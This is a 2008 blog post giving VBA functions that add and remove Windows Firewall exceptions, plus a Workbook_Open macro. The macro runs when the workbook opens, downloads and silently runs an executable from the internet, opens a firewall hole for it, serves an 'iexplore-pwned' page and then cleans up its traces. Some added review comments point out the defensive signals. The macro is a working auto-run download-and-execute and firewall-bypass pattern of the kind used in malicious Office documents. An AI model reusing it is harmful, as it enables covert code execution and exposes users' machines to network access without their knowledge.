Sunday, November 16, 2008

Modifying Windows Firewall Rules from VBA

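You can also modify the Microsoft Windows firewall from within VBA using the HNetCfg.FwMgr object. Versions of these scripts are available on MSDN. Note that HNetCfg.FwMgr is the older firewall interface (later Windows versions also expose HNetCfg.FwPolicy2), and changing the exceptions list typically requires administrative rights.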
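Function Add_App_To_Firewall(program_name, program_executable, program_scope)
' Adds program_executable to the authorized-applications (exceptions) list of
' the Windows Firewall profile that is currently active.
'
'   program_name        display name stored with the exception
'   program_executable  path of the executable image the exception applies to
'   program_scope       NET_FW_SCOPE value (0 = all, 1 = local subnet, 2 = custom)
'
' Returns True when the Add call completed without raising an error and False
' otherwise, so a caller can tell whether the exception was really created.
' Existing callers that invoke this as a statement are unaffected.
'
' Review notes:
'   - Only the current profile is changed; other profiles keep their own lists.
'   - The exception is keyed on the executable path. If that path is writable
'     by unprivileged users, whatever is placed at it inherits the exception,
'     so audit entries whose image lives in a temp or profile directory.
'   - Failures in CreateObject or in reading the profile still raise to the
'     caller, as before; only the Add call itself is guarded.

Const NET_FW_IP_VERSION_ANY = 2

Add_App_To_Firewall = False

' Create the firewall manager object.
Dim fwMgr
Set fwMgr = CreateObject("HNetCfg.FwMgr")

' Get the current profile for the local firewall policy.
Dim profile
Set profile = fwMgr.LocalPolicy.CurrentProfile

' Describe the application exception to be added.
Dim app
Set app = CreateObject("HNetCfg.FwAuthorizedApplication")

app.ProcessImageFileName = program_executable
app.Name = program_name
app.Scope = program_scope

app.IpVersion = NET_FW_IP_VERSION_ANY
app.Enabled = True

' The Add call is the step most likely to be refused (for example when the
' caller lacks the rights to change firewall policy). Do not raise, but record
' the outcome before On Error GoTo 0 resets the Err object.
On Error Resume Next
profile.AuthorizedApplications.Add app
Add_App_To_Firewall = (Err.Number = 0)
On Error GoTo 0

End Function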

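Function Remove_App_From_Firewall(program_executable)
' Removes the exception for program_executable from the authorized-applications
' list of the Windows Firewall profile that is currently active.
'
'   program_executable  path of the executable image whose exception is removed;
'                       it must match the path used when the entry was added
'
' Returns True when no step raised an error and False otherwise. The function
' never raises: every step runs under On Error Resume Next, as in the original.
' The return value matters for clean-up code, because a removal that fails
' silently leaves an inbound allow entry behind with nothing to indicate it.
'
' NOTE(review): whether Remove raises when no matching entry exists is not
' visible here - confirm before treating True as "entry existed and is gone".

On Error Resume Next
Err.Clear

' Create the firewall manager object.
Dim fwMgr
Set fwMgr = CreateObject("HNetCfg.FwMgr")

' Get the current profile for the firewall
Dim fwPolicy
Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile

' Get the Auth Applications object so we can modify
Dim colApplications
Set colApplications = fwPolicy.AuthorizedApplications

colApplications.Remove program_executable

' Err keeps the most recent failure; a successful statement does not clear it,
' so a non-zero number here means at least one step above failed.
Remove_App_From_Firewall = (Err.Number = 0)

End Function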

As an example, here are the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.

Sub Workbook_Open()
' Demonstration macro that runs when the workbook is opened. In order it:
' downloads and unpacks a small web server into %TEMP%, adds a firewall
' exception for it, writes a test page, starts the server on port 12345, opens
' Internet Explorer against it, then stops the server, removes the exception
' and deletes the files it created.
'
' Download_File, Run_Program, Run_Cmd and the INVISIBLE / VISIBLE / WAIT /
' NOWAIT arguments are not defined in this listing; their behaviour is
' presumably what their names suggest - confirm against their definitions.
'
' Review notes (what this sequence looks like from the defensive side):
'   - An Office document process starting child processes (an unzipper, a
'     shell, ping, taskkill, a browser) is a strong signal worth alerting on.
'   - The archive is fetched over plain http and run with no hash or signature
'     check, so its content is whatever the network path delivers.
'   - A firewall exception is created for an executable under %TEMP%, a
'     user-writable location, and removed again within the same run, so
'     firewall change auditing should record additions and removals.
'   - None of the helper calls has a visible result check here, so a failed
'     step does not stop the steps after it.

'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT

' Scope values for the firewall exception; only the local-subnet value is used below.
Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2
' Add the exception under the name "tiny-local", limited to the local subnet.
Add_App_To_Firewall "tiny-local", Environ("TEMP") & "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET

' Write a one-line marker page for the server to serve.
Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT

' Start the server without waiting for it to exit; the arguments are %TEMP%
' (presumably the directory to serve) and 12345 (the port the browser uses below).
Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT

' "Sleep" for a couple of seconds to allow tiny.exe to load
Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT

' Open the page in a visible Internet Explorer window and wait for it.
Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT

' Force-terminate every process whose image name is tiny.exe.
Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT

' Remove the exception using the same path it was added with.
Remove_App_From_Firewall Environ("TEMP") & "\tiny.exe"

' Best-effort clean-up: a Kill that fails (file missing or still locked) is
' ignored, so any of these files can remain in %TEMP% afterwards.
On Error Resume Next
Kill Environ("TEMP") & "\tinyweb.zip"
Kill Environ("TEMP") & "\SRC.zip"
Kill Environ("TEMP") & "\LICENSE.txt"
Kill Environ("TEMP") & "\File_id.diz"
Kill Environ("TEMP") & "\Readme.txt"
Kill Environ("TEMP") & "\Cgitest.zip"
Kill Environ("TEMP") & "\index.html"
Kill Environ("TEMP") & "\tiny.exe"

End Sub
